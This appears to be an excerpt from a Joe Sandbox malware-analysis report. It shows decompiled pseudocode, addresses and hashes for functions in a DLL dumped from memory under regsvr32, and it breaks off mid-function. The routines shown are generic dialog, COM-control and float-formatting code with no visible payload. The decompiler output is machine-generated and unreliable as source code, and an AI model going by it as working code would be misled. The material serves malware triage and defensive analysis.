                                                                        Uniqueness Score: -1.00%

                                                                        Function 100074F2 Relevance: 10.7, APIs: 7, Instructions: 247memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 67%
                                                                        			E100074F2(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _t132;
				int* _t133;
				int _t138;
				intOrPtr* _t139;
				int _t142;
				int* _t143;
				int _t146;
				int _t171;
				intOrPtr _t172;
				int _t173;
				intOrPtr _t178;
				int _t183;
				int _t186;
				void* _t187;
				int* _t191;
				void* _t213;
				int* _t216;
				short _t217;
				intOrPtr* _t225;
				void* _t227;
				struct tagRECT _t228;
				int* _t229;
				signed int _t233;
				int* _t235;
				int* _t237;
				int* _t238;
				void* _t239;

				_t227 = __esi;
				E10011BF0(0x1003a548, _t239);
				_t132 =  *0x1004c470; // 0x303bb91f
				_t225 =  *((intOrPtr*)(_t239 + 0x14));
				 *((intOrPtr*)(_t239 - 0x10)) = _t132;
				_t183 = 0;
				_t133 = _t225 + 0x12;
				 *(_t239 - 0x34) = _t133;
				if( *(_t239 + 0x10) != 0) {
					 *((intOrPtr*)(_t239 - 0x58)) =  *((intOrPtr*)(_t225 + 8));
					 *((intOrPtr*)(_t239 - 0x54)) =  *((intOrPtr*)(_t225 + 4));
					 *((short*)(_t239 - 0x50)) =  *((intOrPtr*)(_t225 + 0xc));
					 *((short*)(_t239 - 0x4e)) =  *((intOrPtr*)(_t225 + 0xe));
					 *((short*)(_t239 - 0x4a)) =  *_t133;
					_t216 = _t225 + 0x18;
					 *((short*)(_t239 - 0x4c)) =  *(_t225 + 0x10);
					 *((short*)(_t239 - 0x48)) =  *((intOrPtr*)(_t225 + 0x14));
					_t225 = _t239 - 0x58;
					 *(_t239 - 0x34) = _t216;
				}
				_t217 =  *((short*)(_t225 + 0xa));
				_push(_t227);
				_t228 =  *((short*)(_t225 + 8));
				 *((intOrPtr*)(_t239 - 0x5c)) =  *((short*)(_t225 + 0xe)) + _t217;
				 *(_t239 - 0x68) = _t228;
				 *((intOrPtr*)(_t239 - 0x64)) = _t217;
				 *((intOrPtr*)(_t239 - 0x60)) =  *((short*)(_t225 + 0xc)) + _t228;
				_t138 = MapDialogRect( *( *((intOrPtr*)(_t239 + 8)) + 0x1c), _t239 - 0x68);
				_t229 =  *(_t239 + 0x1c);
				 *(_t239 - 0x28) = _t183;
				if( *((intOrPtr*)(_t239 + 0x20)) >= 4) {
					_t186 =  *_t229;
					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - 4;
					_t229 =  &(_t229[1]);
					if(_t186 > 0) {
						__imp__#4(_t229, _t186);
						_t187 = _t186 + _t186;
						_t229 = _t229 + _t187;
						 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t187;
						 *(_t239 - 0x28) = _t138;
					}
					_t183 = 0;
				}
				 *(_t239 - 0x2c) = _t183;
				_t139 = E100243B2();
				_t218 =  *_t139;
				 *((intOrPtr*)(_t239 + 0x14)) =  *((intOrPtr*)( *_t139 + 0xc))() + 0x10;
				 *(_t239 - 4) = _t183;
				 *(_t239 - 0x38) = _t183;
				 *(_t239 - 0x3c) = _t183;
				 *(_t239 - 0x30) = _t183;
				if( *((short*)(_t239 + 0x18)) == 0x37a ||  *((short*)(_t239 + 0x18)) == 0x37b) {
					_t142 =  *_t229;
					_t49 = _t142 - 0xc; // -28
					_t191 = _t49;
					_t229 =  &(_t229[3]);
					 *(_t239 - 0x40) = _t142;
					 *(_t239 + 0x1c) = _t191;
					if(_t191 > _t183) {
						do {
							_t171 =  *_t229;
							 *(_t239 + 0x1c) =  *(_t239 + 0x1c) - 6;
							_t235 =  &(_t229[1]);
							_t229 =  &(_t235[0]);
							 *(_t239 - 0x44) = _t171;
							 *(_t239 + 0x10) =  *_t235;
							if(_t171 != 0x80010001) {
								_t172 = E1001F77E(0x1c);
								 *((intOrPtr*)(_t239 - 0x6c)) = _t172;
								__eflags = _t172 - _t183;
								 *(_t239 - 4) = 1;
								if(_t172 == _t183) {
									_t173 = 0;
									__eflags = 0;
								} else {
									_t173 = E1000B256(_t172,  *(_t239 - 0x2c),  *(_t239 - 0x44),  *(_t239 + 0x10));
								}
								 *(_t239 - 4) = 0;
								 *(_t239 - 0x2c) = _t173;
							} else {
								_t237 =  &(_t229[1]);
								 *(_t239 - 0x3c) =  *_t229;
								_t238 =  &(_t237[3]);
								 *(_t239 - 0x30) =  *_t237;
								E10006AEC(_t239 + 0x14, _t238);
								_t178 =  *((intOrPtr*)( *((intOrPtr*)(_t239 + 0x14)) - 0xc));
								_t213 = 0xffffffef;
								 *(_t239 + 0x1c) =  *(_t239 + 0x1c) + _t213 - _t178;
								_t229 = _t238 + _t178 + 1;
								 *(_t239 - 0x38) =  *(_t239 + 0x10);
							}
						} while ( *(_t239 + 0x1c) > _t183);
						_t142 =  *(_t239 - 0x40);
					}
					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t142;
					 *((intOrPtr*)(_t239 + 0x18)) =  *((intOrPtr*)(_t239 + 0x18)) + 0xfffc;
				}
				_t143 =  *(_t239 - 0x34);
				_t256 =  *_t143 - 0x7b;
				_push(_t239 - 0x20);
				_push(_t143);
				if( *_t143 != 0x7b) {
					__imp__CLSIDFromProgID();
				} else {
					__imp__CLSIDFromString();
				}
				_push(_t183);
				_push( *((intOrPtr*)(_t239 + 0x20)));
				_push(_t229);
				 *(_t239 + 0x1c) = _t143;
				E1002EC6C(_t239 - 0x94, _t256);
				 *(_t239 - 4) = 2;
				 *(_t239 - 0x24) = _t183;
				asm("sbb esi, esi");
				_t233 =  ~( *((intOrPtr*)(_t239 + 0x18)) - 0x378) & _t239 - 0x00000094;
				if( *(_t239 + 0x1c) >= _t183 && E100090DE( *((intOrPtr*)(_t239 + 8))) != 0 && E10009A9F( *((intOrPtr*)( *((intOrPtr*)(_t239 + 8)) + 0x48)), _t183, _t239 - 0x20, _t183,  *_t225, _t239 - 0x68,  *(_t225 + 0x10) & 0x0000ffff, _t233, 0 |  *((short*)(_t239 + 0x18)) == 0x00000377,  *(_t239 - 0x28), _t239 - 0x24) != 0) {
					E1000A762( *(_t239 - 0x24), 1);
					SetWindowPos( *( *(_t239 - 0x24) + 0x20),  *(_t239 + 0xc), _t183, _t183, _t183, _t183, 0x13);
					 *( *(_t239 - 0x24) + 0x90) =  *(_t239 - 0x2c);
					E100074A5(_t183,  *(_t239 - 0x24) + 0xa0, _t239, _t239 + 0x14);
					 *((short*)( *(_t239 - 0x24) + 0x94)) =  *(_t239 - 0x38);
					 *( *(_t239 - 0x24) + 0x98) =  *(_t239 - 0x3c);
					 *( *(_t239 - 0x24) + 0x9c) =  *(_t239 - 0x30);
				}
				if( *(_t239 - 0x28) != _t183) {
					__imp__#6( *(_t239 - 0x28));
				}
				_t146 =  *(_t239 - 0x24);
				if(_t146 == _t183) {
					 *( *(_t239 + 0x24)) = _t183;
				} else {
					 *( *(_t239 + 0x24)) =  *(_t146 + 0x20);
					_t183 = 1;
				}
				 *(_t239 - 4) = 0;
				E1002EFD7(_t183, _t239 - 0x94, _t218);
				E100014B0( *((intOrPtr*)(_t239 + 0x14)) + 0xfffffff0, _t218);
				 *[fs:0x0] =  *((intOrPtr*)(_t239 - 0xc));
				return E100117AE(_t183,  *((intOrPtr*)(_t239 - 0x10)));
			}






























                                                                        0x100074f2
                                                                        0x100074f7
                                                                        0x10007502
                                                                        0x10007509
                                                                        0x1000750c
                                                                        0x1000750f
                                                                        0x10007514
                                                                        0x10007517
                                                                        0x1000751a
                                                                        0x10007522
                                                                        0x10007528
                                                                        0x1000752f
                                                                        0x10007539
                                                                        0x10007541
                                                                        0x10007549
                                                                        0x1000754c
                                                                        0x10007550
                                                                        0x10007554
                                                                        0x10007557
                                                                        0x10007557
                                                                        0x1000755a
                                                                        0x10007568
                                                                        0x10007569
                                                                        0x1000756d
                                                                        0x1000757c
                                                                        0x1000757f
                                                                        0x10007582
                                                                        0x10007585
                                                                        0x1000758f
                                                                        0x10007592
                                                                        0x10007595
                                                                        0x10007597
                                                                        0x10007599
                                                                        0x1000759d
                                                                        0x100075a2
                                                                        0x100075a6
                                                                        0x100075ac
                                                                        0x100075ae
                                                                        0x100075b0
                                                                        0x100075b3
                                                                        0x100075b3
                                                                        0x100075b6
                                                                        0x100075b6
                                                                        0x100075b8
                                                                        0x100075bb
                                                                        0x100075c0
                                                                        0x100075ca
                                                                        0x100075d3
                                                                        0x100075d6
                                                                        0x100075d9
                                                                        0x100075dc
                                                                        0x100075df
                                                                        0x100075ed
                                                                        0x100075ef
                                                                        0x100075ef
                                                                        0x100075f2
                                                                        0x100075f7
                                                                        0x100075fa
                                                                        0x100075fd
                                                                        0x10007603
                                                                        0x10007603
                                                                        0x10007605
                                                                        0x10007609
                                                                        0x10007610
                                                                        0x10007616
                                                                        0x10007619
                                                                        0x1000761d
                                                                        0x10007654
                                                                        0x1000765a
                                                                        0x1000765d
                                                                        0x1000765f
                                                                        0x10007663
                                                                        0x10007677
                                                                        0x10007677
                                                                        0x10007665
                                                                        0x10007670
                                                                        0x10007670
                                                                        0x10007679
                                                                        0x1000767d
                                                                        0x1000761f
                                                                        0x10007621
                                                                        0x10007624
                                                                        0x10007629
                                                                        0x10007630
                                                                        0x10007633
                                                                        0x1000763b
                                                                        0x10007640
                                                                        0x10007643
                                                                        0x10007646
                                                                        0x1000764d
                                                                        0x1000764d
                                                                        0x10007680
                                                                        0x10007689
                                                                        0x10007689
                                                                        0x1000768c
                                                                        0x1000768f
                                                                        0x1000768f
                                                                        0x10007696
                                                                        0x10007699
                                                                        0x100076a0
                                                                        0x100076a1
                                                                        0x100076a2
                                                                        0x100076ac
                                                                        0x100076a4
                                                                        0x100076a4
                                                                        0x100076a4
                                                                        0x100076b2
                                                                        0x100076b3
                                                                        0x100076bc
                                                                        0x100076bd
                                                                        0x100076c0
                                                                        0x100076d7
                                                                        0x100076db
                                                                        0x100076de
                                                                        0x100076e0
                                                                        0x100076e5
                                                                        0x10007734
                                                                        0x10007748
                                                                        0x10007754
                                                                        0x10007767
                                                                        0x10007773
                                                                        0x10007780
                                                                        0x1000778c
                                                                        0x1000778c
                                                                        0x10007796
                                                                        0x1000779b
                                                                        0x1000779b
                                                                        0x100077a1
                                                                        0x100077a6
                                                                        0x100077b8
                                                                        0x100077a8
                                                                        0x100077b0
                                                                        0x100077b2
                                                                        0x100077b2
                                                                        0x100077c0
                                                                        0x100077c4
                                                                        0x100077cf
                                                                        0x100077d8
                                                                        0x100077eb

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 100074F7
                                                                        • MapDialogRect.USER32(?,?), ref: 10007585
                                                                        • SysAllocStringLen.OLEAUT32(?,00000000), ref: 100075A6
                                                                        • CLSIDFromString.OLE32(?,00000004), ref: 100076A4
                                                                        • CLSIDFromProgID.OLE32(?,00000004), ref: 100076AC
                                                                        • SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,00000004,00000000,?,?,?,0000FC84,00000000), ref: 10007748
                                                                        • SysFreeString.OLEAUT32(?), ref: 1000779B
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: String$From$AllocDialogFreeH_prologProgRectWindow
                                                                        • String ID:
                                                                        • API String ID: 493809305-0
                                                                        • Opcode ID: 49f95f9342accb2b989199e6a3fe790c04b9925ae12edf67e65d2fb5adebfaa9
                                                                        • Instruction ID: 430f13df2ed8550076e5f7c2e9f31eb497c55eb67174fe5e7936e43fbe5827de
                                                                        • Opcode Fuzzy Hash: 49f95f9342accb2b989199e6a3fe790c04b9925ae12edf67e65d2fb5adebfaa9
                                                                        • Instruction Fuzzy Hash: F5A12475D00619DFDB04CFA8C884AEDBBF4FF08344F118529E819AB251E735AE90CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001BC3A Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 228COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 73%
                                                                        			E1001BC3A(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed short* _a24) {
				intOrPtr _v8;
				char _v9;
				signed int _v10;
				signed int _v14;
				signed int _v18;
				signed short _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v44;
				signed int _v48;
				signed short* _v52;
				intOrPtr _t87;
				signed int _t88;
				signed short* _t99;
				intOrPtr* _t100;
				signed int _t101;
				signed short _t103;
				signed int _t105;
				signed short* _t131;
				signed int _t133;
				signed int _t139;
				signed short* _t141;
				signed short _t149;
				signed int _t151;
				signed int _t152;
				signed int _t159;
				signed int _t161;
				signed int _t164;
				void* _t165;
				void* _t166;

				_t87 =  *0x1004c470; // 0x303bb91f
				_v8 = _t87;
				_t88 = _a12;
				_t131 = _a24;
				_t133 = _t88 & 0x00008000;
				_v32 = 0xcc;
				_v31 = 0xcc;
				_v30 = 0xcc;
				_v29 = 0xcc;
				_v28 = 0xcc;
				_v27 = 0xcc;
				_v26 = 0xcc;
				_v25 = 0xcc;
				_v24 = 0xcc;
				_v23 = 0xcc;
				_v22 = 0xfb;
				_v21 = 0x3f;
				_v48 = 1;
				_t149 = _t88 & 0x00007fff;
				if(_t133 == 0) {
					_t131[1] = 0x20;
				} else {
					_t131[1] = 0x2d;
				}
				_t151 = _a8;
				if(_t149 != 0 || _t151 != 0 || _a4 != _t151) {
					if(_t149 != 0x7fff) {
						_t90 = _t149 & 0x0000ffff;
						_v20 = _v20 & 0x00000000;
						_v18 = _a4;
						_t159 = (((_t149 & 0x0000ffff) >> 8) + (_t151 >> 0x18) * 2) * 0x4d + _t90 * 0x4d10 - 0x134312f4 >> 0x10;
						_v10 = _t149;
						_v14 = _t151;
						E1001C383(_t131, _t151, _t159,  &_v20,  ~_t159, 1);
						_t166 = _t165 + 0xc;
						__eflags = _v10 - 0x3fff;
						if(_v10 >= 0x3fff) {
							_t159 = _t159 + 1;
							__eflags = _t159;
							E1001C151(_t131, _t151, _t159,  &_v20,  &_v32);
						}
						__eflags = _a20 & 0x00000001;
						_t152 = _a16;
						 *_t131 = _t159;
						if((_a20 & 0x00000001) == 0) {
							L27:
							__eflags = _t152 - 0x15;
							if(_t152 > 0x15) {
								_t152 = 0x15;
							}
							_t161 = (_v10 & 0x0000ffff) - 0x3ffe;
							_t52 =  &_v10;
							 *_t52 = _v10 & 0x00000000;
							__eflags =  *_t52;
							_a12 = 8;
							do {
								E1001B6CD( &_v20);
								_t56 =  &_a12;
								 *_t56 = _a12 - 1;
								__eflags =  *_t56;
							} while ( *_t56 != 0);
							__eflags = _t161;
							if(_t161 < 0) {
								_t164 =  ~_t161 & 0x000000ff;
								__eflags = _t164;
								if(_t164 > 0) {
									do {
										E1001B6FB( &_v20);
										_t164 = _t164 - 1;
										__eflags = _t164;
									} while (_t164 != 0);
								}
							}
							_t59 = _t152 + 1; // 0xcd
							_t139 = _t59;
							__eflags = _t139;
							_t99 =  &(_t131[2]);
							_v52 = _t99;
							if(_t139 > 0) {
								_a12 = _t139;
								do {
									asm("movsd");
									asm("movsd");
									asm("movsd");
									E1001B6CD( &_v20);
									E1001B6CD( &_v20);
									E1001B66F(__eflags,  &_v20,  &_v44);
									E1001B6CD( &_v20);
									_t166 = _t166 + 0x14;
									_v52 =  &(_v52[0]);
									_t74 =  &_a12;
									 *_t74 = _a12 - 1;
									__eflags =  *_t74;
									 *_v52 = _v9 + 0x30;
									_v9 = 0;
								} while ( *_t74 != 0);
								_t99 = _v52;
							}
							_t100 = _t99 - 1;
							_t101 = _t100 - 1;
							__eflags =  *_t100 - 0x35;
							_t141 =  &(_t131[2]);
							if( *_t100 < 0x35) {
								while(1) {
									__eflags = _t101 - _t141;
									if(_t101 < _t141) {
										break;
									}
									__eflags =  *_t101 - 0x30;
									if( *_t101 == 0x30) {
										_t101 = _t101 - 1;
										__eflags = _t101;
										continue;
									}
									break;
								}
								__eflags = _t101 - _t141;
								if(_t101 >= _t141) {
									goto L46;
								} else {
									 *_t141 = 0x30;
									goto L54;
								}
							} else {
								while(1) {
									__eflags = _t101 - _t141;
									if(_t101 < _t141) {
										break;
									}
									__eflags =  *_t101 - 0x39;
									if( *_t101 == 0x39) {
										 *_t101 = 0x30;
										_t101 = _t101 - 1;
										__eflags = _t101;
										continue;
									}
									break;
								}
								__eflags = _t101 - _t141;
								if(_t101 < _t141) {
									_t101 = _t101 + 1;
									 *_t131 =  *_t131 + 1;
									__eflags =  *_t131;
								}
								 *_t101 =  *_t101 + 1;
								__eflags =  *_t101;
								L46:
								_t103 = _t101 - _t131 - 3;
								__eflags = _t103;
								_t131[1] = _t103;
								 *((char*)( &(_t131[2]) + _t103)) = 0;
								goto L47;
							}
						} else {
							_t152 = _t152 + _t159;
							__eflags = _t152;
							if(_t152 > 0) {
								goto L27;
							} else {
								goto L26;
							}
						}
					} else {
						 *_t131 = 1;
						if(_t151 != 0x80000000 || _a4 != 0) {
							if((_t151 & 0x40000000) != 0) {
								goto L11;
							} else {
								_push("1#SNAN");
								goto L21;
							}
						} else {
							L11:
							__eflags = _t133;
							if(_t133 == 0) {
								L15:
								__eflags = _t151 - 0x80000000;
								if(_t151 != 0x80000000) {
									goto L20;
								} else {
									__eflags = _a4;
									if(_a4 != 0) {
										goto L20;
									} else {
										_push("1#INF");
										goto L18;
									}
								}
							} else {
								__eflags = _t151 - 0xc0000000;
								if(_t151 != 0xc0000000) {
									goto L15;
								} else {
									__eflags = _a4;
									if(_a4 != 0) {
										L20:
										_push("1#QNAN");
										L21:
										_push( &(_t131[2]));
										E10017B90();
										_t131[1] = 6;
									} else {
										_push("1#IND");
										L18:
										_push( &(_t131[2]));
										E10017B90();
										_t131[1] = 5;
									}
								}
							}
						}
						_v48 = _v48 & 0x00000000;
						L47:
						_t105 = _v48;
					}
				} else {
					L26:
					_t131[2] = 0x30;
					L54:
					 *_t131 =  *_t131 & 0x00000000;
					_t131[1] = 0x20;
					_t131[1] = 1;
					_t131[2] = 0;
					_t105 = 1;
				}
				return E100117AE(_t105, _v8);
			}











































                                                                        0x1001bc40
                                                                        0x1001bc45
                                                                        0x1001bc48
                                                                        0x1001bc4c
                                                                        0x1001bc57
                                                                        0x1001bc63
                                                                        0x1001bc67
                                                                        0x1001bc6b
                                                                        0x1001bc6f
                                                                        0x1001bc73
                                                                        0x1001bc77
                                                                        0x1001bc7b
                                                                        0x1001bc7f
                                                                        0x1001bc83
                                                                        0x1001bc87
                                                                        0x1001bc8b
                                                                        0x1001bc8f
                                                                        0x1001bc93
                                                                        0x1001bc9a
                                                                        0x1001bc9c
                                                                        0x1001bca4
                                                                        0x1001bc9e
                                                                        0x1001bc9e
                                                                        0x1001bc9e
                                                                        0x1001bcab
                                                                        0x1001bcae
                                                                        0x1001bcc0
                                                                        0x1001bd3a
                                                                        0x1001bd45
                                                                        0x1001bd62
                                                                        0x1001bd65
                                                                        0x1001bd74
                                                                        0x1001bd78
                                                                        0x1001bd7b
                                                                        0x1001bd80
                                                                        0x1001bd83
                                                                        0x1001bd89
                                                                        0x1001bd93
                                                                        0x1001bd93
                                                                        0x1001bd94
                                                                        0x1001bd9a
                                                                        0x1001bd9b
                                                                        0x1001bd9f
                                                                        0x1001bda2
                                                                        0x1001bda5
                                                                        0x1001bdb9
                                                                        0x1001bdb9
                                                                        0x1001bdbc
                                                                        0x1001bdc0
                                                                        0x1001bdc0
                                                                        0x1001bdc5
                                                                        0x1001bdcb
                                                                        0x1001bdcb
                                                                        0x1001bdcb
                                                                        0x1001bdd0
                                                                        0x1001bdd7
                                                                        0x1001bddb
                                                                        0x1001bde0
                                                                        0x1001bde0
                                                                        0x1001bde0
                                                                        0x1001bde3
                                                                        0x1001bde6
                                                                        0x1001bde8
                                                                        0x1001bdec
                                                                        0x1001bdec
                                                                        0x1001bdf2
                                                                        0x1001bdf4
                                                                        0x1001bdf8
                                                                        0x1001bdfd
                                                                        0x1001bdfd
                                                                        0x1001bdfe
                                                                        0x1001bdf4
                                                                        0x1001bdf2
                                                                        0x1001be01
                                                                        0x1001be01
                                                                        0x1001be04
                                                                        0x1001be06
                                                                        0x1001be09
                                                                        0x1001be0c
                                                                        0x1001be0e
                                                                        0x1001be11
                                                                        0x1001be17
                                                                        0x1001be18
                                                                        0x1001be1d
                                                                        0x1001be1e
                                                                        0x1001be27
                                                                        0x1001be34
                                                                        0x1001be3d
                                                                        0x1001be4a
                                                                        0x1001be4d
                                                                        0x1001be50
                                                                        0x1001be50
                                                                        0x1001be50
                                                                        0x1001be53
                                                                        0x1001be55
                                                                        0x1001be55
                                                                        0x1001be5b
                                                                        0x1001be5b
                                                                        0x1001be5e
                                                                        0x1001be61
                                                                        0x1001be62
                                                                        0x1001be65
                                                                        0x1001be68
                                                                        0x1001bea8
                                                                        0x1001bea8
                                                                        0x1001beaa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001bea2
                                                                        0x1001bea5
                                                                        0x1001bea7
                                                                        0x1001bea7
                                                                        0x00000000
                                                                        0x1001bea7
                                                                        0x00000000
                                                                        0x1001bea5
                                                                        0x1001beac
                                                                        0x1001beae
                                                                        0x00000000
                                                                        0x1001beb0
                                                                        0x1001beb0
                                                                        0x00000000
                                                                        0x1001beb0
                                                                        0x1001be6a
                                                                        0x1001be75
                                                                        0x1001be75
                                                                        0x1001be77
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001be6c
                                                                        0x1001be6f
                                                                        0x1001be71
                                                                        0x1001be74
                                                                        0x1001be74
                                                                        0x00000000
                                                                        0x1001be74
                                                                        0x00000000
                                                                        0x1001be6f
                                                                        0x1001be79
                                                                        0x1001be7b
                                                                        0x1001be7d
                                                                        0x1001be7e
                                                                        0x1001be7e
                                                                        0x1001be7e
                                                                        0x1001be81
                                                                        0x1001be81
                                                                        0x1001be83
                                                                        0x1001be85
                                                                        0x1001be85
                                                                        0x1001be87
                                                                        0x1001be8d
                                                                        0x00000000
                                                                        0x1001be8d
                                                                        0x1001bda7
                                                                        0x1001bdaa
                                                                        0x1001bdac
                                                                        0x1001bdae
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001bdae
                                                                        0x1001bcc2
                                                                        0x1001bcc9
                                                                        0x1001bcce
                                                                        0x1001bcdc
                                                                        0x00000000
                                                                        0x1001bcde
                                                                        0x1001bcde
                                                                        0x00000000
                                                                        0x1001bcde
                                                                        0x1001bce5
                                                                        0x1001bce5
                                                                        0x1001bce5
                                                                        0x1001bce8
                                                                        0x1001bcff
                                                                        0x1001bcff
                                                                        0x1001bd01
                                                                        0x00000000
                                                                        0x1001bd03
                                                                        0x1001bd03
                                                                        0x1001bd07
                                                                        0x00000000
                                                                        0x1001bd09
                                                                        0x1001bd09
                                                                        0x00000000
                                                                        0x1001bd09
                                                                        0x1001bd07
                                                                        0x1001bcea
                                                                        0x1001bcea
                                                                        0x1001bcf0
                                                                        0x00000000
                                                                        0x1001bcf2
                                                                        0x1001bcf2
                                                                        0x1001bcf6
                                                                        0x1001bd26
                                                                        0x1001bd26
                                                                        0x1001bd2b
                                                                        0x1001bd2e
                                                                        0x1001bd2f
                                                                        0x1001bd34
                                                                        0x1001bcf8
                                                                        0x1001bcf8
                                                                        0x1001bd0e
                                                                        0x1001bd11
                                                                        0x1001bd12
                                                                        0x1001bd17
                                                                        0x1001bd17
                                                                        0x1001bcf6
                                                                        0x1001bcf0
                                                                        0x1001bce8
                                                                        0x1001bd1b
                                                                        0x1001be92
                                                                        0x1001be92
                                                                        0x1001be92
                                                                        0x1001bdb0
                                                                        0x1001bdb0
                                                                        0x1001bdb0
                                                                        0x1001beb3
                                                                        0x1001beb3
                                                                        0x1001beb9
                                                                        0x1001bebd
                                                                        0x1001bec1
                                                                        0x1001bec5
                                                                        0x1001bec5
                                                                        0x1001bea1

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ___shr_12
                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?
                                                                        • API String ID: 2664560246-4131533671
                                                                        • Opcode ID: 41872633d6340cc6f23dba41c7221c5f3b32f20f70e5c2c0d702b1f865941683
                                                                        • Instruction ID: 0f4b10661b4c6afdc81634f06d58437e80c3cbb5605fe3a4bfa1b348def2c0f3
                                                                        • Opcode Fuzzy Hash: 41872633d6340cc6f23dba41c7221c5f3b32f20f70e5c2c0d702b1f865941683
                                                                        • Instruction Fuzzy Hash: 47810232804A9ACECF01CB68C8847EEBBF4EF15354F0545AAE850DF282E774D685C3A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002DA8D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 174COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 29%
                                                                        			E1002DA8D(intOrPtr __ecx, void* __edx) {
				void* __esi;
				void* __ebp;
				intOrPtr _t60;
				signed char _t65;
				signed int _t70;
				signed int _t71;
				intOrPtr _t109;
				signed int _t115;
				signed int _t117;
				void* _t133;
				void* _t135;
				intOrPtr _t140;
				void* _t143;
				void* _t145;

				_t133 = __edx;
				_t143 = _t145 - 0xa8;
				_t60 =  *0x1004c470; // 0x303bb91f
				_t140 =  *((intOrPtr*)(_t143 + 0xb0));
				 *((intOrPtr*)(_t143 + 0xa4)) = _t60;
				_t109 = __ecx;
				_t62 = GetWindowRect( *(_t140 + 0x1c), _t143 - 0x80);
				if( *((intOrPtr*)(_t140 + 0x88)) != _t109 ||  *(_t143 + 0xb4) != 0 && EqualRect(_t143 - 0x80,  *(_t143 + 0xb4)) == 0) {
					if( *((intOrPtr*)(_t109 + 0x90)) != 0 && ( *(_t140 + 0x80) & 0x00000040) != 0) {
						 *(_t109 + 0x7c) =  *(_t109 + 0x7c) | 0x00000040;
					}
					 *(_t109 + 0x7c) =  *(_t109 + 0x7c) & 0xfffffff9;
					_t65 =  *(_t140 + 0x7c) & 0x00000006 |  *(_t109 + 0x7c);
					 *(_t109 + 0x7c) = _t65;
					if((_t65 & 0x00000040) == 0) {
						_push(0x104);
						_push(_t143 - 0x60);
						E1002095F(_t140);
						E10029B23(_t140,  *((intOrPtr*)(_t109 + 0x1c)), _t143 - 0x60);
					}
					_t70 = ( *(_t140 + 0x7c) ^  *(_t109 + 0x7c)) & 0x0000f000 ^  *(_t140 + 0x7c) | 0x00000f00;
					if( *((intOrPtr*)(_t109 + 0x90)) == 0) {
						_t71 = _t70 & 0xfffffffe;
					} else {
						_t71 = _t70 | 0x00000001;
					}
					E100383D0(_t140, _t71);
					_push(0xffffffff);
					_t135 = E1002CDCE(_t109, GetDlgCtrlID( *(_t140 + 0x1c)) & 0x0000ffff);
					if(_t135 > 0) {
						 *((intOrPtr*)(E100086F2(_t109 + 0x94, _t135))) = _t140;
					}
					if( *(_t143 + 0xb4) == 0) {
						if(_t135 < 1) {
							_t137 = _t109 + 0x94;
							E1001E2BE(_t109 + 0x94, _t143,  *((intOrPtr*)(_t109 + 0x9c)), _t140);
							E1001E2BE(_t137, _t143,  *((intOrPtr*)(_t137 + 8)), 0);
						}
						_t115 =  *0x1004efa4; // 0x2
						_push(0x115);
						_push(0);
						_push(0);
						_push( ~_t115);
						_t117 =  *0x1004efa0; // 0x2
						_push( ~_t117);
						_push(0);
					} else {
						CopyRect(_t143 - 0x70,  *(_t143 + 0xb4));
						E10028E5A(_t109, _t143 - 0x70);
						if(_t135 < 1) {
							asm("cdq");
							asm("cdq");
							_push(( *((intOrPtr*)(_t143 - 0x64)) -  *((intOrPtr*)(_t143 - 0x6c)) - _t133 >> 1) +  *((intOrPtr*)(_t143 - 0x6c)));
							_push(( *((intOrPtr*)(_t143 - 0x68)) -  *(_t143 - 0x70) - _t133 >> 1) +  *(_t143 - 0x70));
							_push( *((intOrPtr*)(_t143 + 0xb0)));
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
